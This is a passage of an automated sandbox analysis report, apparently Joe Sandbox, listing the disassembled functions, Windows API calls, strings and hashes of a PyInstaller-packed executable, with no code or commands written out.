                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                  • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction ID: c1cab2659841ab4b17ec5aefbb1dc03c87c7df249e3fecf0500bc6ca7902e583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D119631B18A4286E751AB52FC55339A3A1FBA8BF4F400734DA5D877A4DF3CD4588B50
                                                                                                                                                                                                                                  Function 00007FF72C658ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658EFD
                                                                                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658F5A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658FE5
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659044
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659055
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C65906A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                                                                                  • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                  • Instruction ID: 45aa486cb43e8da2c99fb29abee3855fa73dab5e373ef8af8e499d9eca07cd38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B341D662A1968281EA31AB11AC003BAB396FF99BE4F940539DF4D57789DF3DD501CF20
                                                                                                                                                                                                                                  Function 00007FF72C6590E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetCurrentProcess.KERNEL32 ref: 00007FF72C658590
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: OpenProcessToken.ADVAPI32 ref: 00007FF72C6585A3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.ADVAPI32 ref: 00007FF72C6585C8
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetLastError.KERNEL32 ref: 00007FF72C6585D2
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.ADVAPI32 ref: 00007FF72C658612
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72C65862E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: CloseHandle.KERNEL32 ref: 00007FF72C658646
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C65916C
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C659175
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                  • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction ID: 430de809b3fb511dda6bfa2792f7ff47d410db63dc1c24250cec4923645aa75c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4214F21A0874291E612BB10EC153EAA362FFA8790FE44435EA4D53BD6DF3CD805CB60
                                                                                                                                                                                                                                  Function 00007FFBAA497370 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 174288908-0
                                                                                                                                                                                                                                  • Opcode ID: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                                  • Instruction ID: cfcf215a138ab426ed2addcdfb8a4ff2964db9795bd9705d0ae2d42327c1750e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e73c3e338b1d3a0163c9cb3dc333ceb7c9fc365eae773b70ffb101dc398ab952
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA216A61B0A642C1FA655B31E4C837D2398BF487B4F140275ED2E027E5DF3DD4268710
                                                                                                                                                                                                                                  Function 00007FF72C66B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B2D7
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B30D
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B33A
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B34B
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B35C
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B377
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                  • Instruction ID: b528dea49729ec2de321f3305e8fcd7e978b44b48f469b021a3813d14ec907ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16118E24B0C243C2FA5A73215E5113DB163FFA47B0FA44738EA6E576D6DE2CA4415B21
                                                                                                                                                                                                                                  Function 00007FF72C652910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                  • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                  • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                  • Instruction ID: 1a293b21af12d5c7a05d2a9e3fd064be512ebb6b8f574076b13183a5b28a55a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F131F662B1868152E721B761AC412E7A396FF987E4F900136EF8D83749EF3CD14ACA10
                                                                                                                                                                                                                                  Function 00007FF72C652390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                  • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                  • Instruction ID: 292e865b91f1ef857576b84c42e0cea15a61e894af5280f7789b99ea8d095d60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D031A472619A8284EB21EF21EC552FAB361FF99794F900135EA4E47B49DF3CD104CB10
                                                                                                                                                                                                                                  Function 00007FFBAA497884 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
                                                                                                                                                                                                                                  • API String ID: 0-1751716127
                                                                                                                                                                                                                                  • Opcode ID: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
                                                                                                                                                                                                                                  • Instruction ID: a180e56392020ba00b8599a0e9ffa1f8b95dd46954f204453d36c710a7471f6c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5086264f726791613e909880d31947cc31a9419187b2cdc6173c49615d767bb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 853143A1A0AA42C5FA228B35E8C47AE6368FB8CBC4F440172EE8D43755DE3DD456C760
                                                                                                                                                                                                                                  Function 00007FF72C652B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72C65918F,?,00007FF72C653C55), ref: 00007FF72C652BA0
                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF72C652C2A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                  • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                  • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                  • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                  • Instruction ID: 5d3f22c610251f6ece640e35ebf42f2006ddb559cb5cd631cd3f015714843d58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB21D122708B4292E712AB54F8457AAB3A6FB987D4F800136EE8D53659DE3CD219CB50
                                                                                                                                                                                                                                  Function 00007FF72C652710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72C651B99), ref: 00007FF72C652760
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                  • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                  • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                  • Instruction ID: 232d3d0a5cfeb901089f2024ed04681c0f1170c3fc9ebe893d224d8437097657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF21B232A18B8292E721EB50BC417E6B3A5FB983E4F900136FE8D43659DF7CD1498B50
                                                                                                                                                                                                                                  Function 00007FFBAA497F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: getservbynamehtons
                                                                                                                                                                                                                                  • String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
                                                                                                                                                                                                                                  • API String ID: 3889749166-1257235949
                                                                                                                                                                                                                                  • Opcode ID: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                                  • Instruction ID: f670f555b5dbf79eb7b00669b081cf5799167f37fbfd39e0f79e8a8e2b1dfd5a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 601121A160EA42C1EA028B31E9C427D7378FB89B85F540072FE8D43668DF3DD066C720
                                                                                                                                                                                                                                  Function 00007FFBAA4C339C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID: ]>mBD
                                                                                                                                                                                                                                  • API String ID: 2933794660-976336857
                                                                                                                                                                                                                                  • Opcode ID: 349ebb80db9919ede78f7f8e81212651b3724fe5d899dc880833b43ba8ec01b9
                                                                                                                                                                                                                                  • Instruction ID: f6ad7f8836316e80cb1d810010cb7ea09c9cf966ed3f5011606e888921408961
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 349ebb80db9919ede78f7f8e81212651b3724fe5d899dc880833b43ba8ec01b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4114862B16F01CAEB018F71E8442B833B8FB18758F440A31EE2D427A4EF38D1558350
                                                                                                                                                                                                                                  Function 00007FF72C669A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
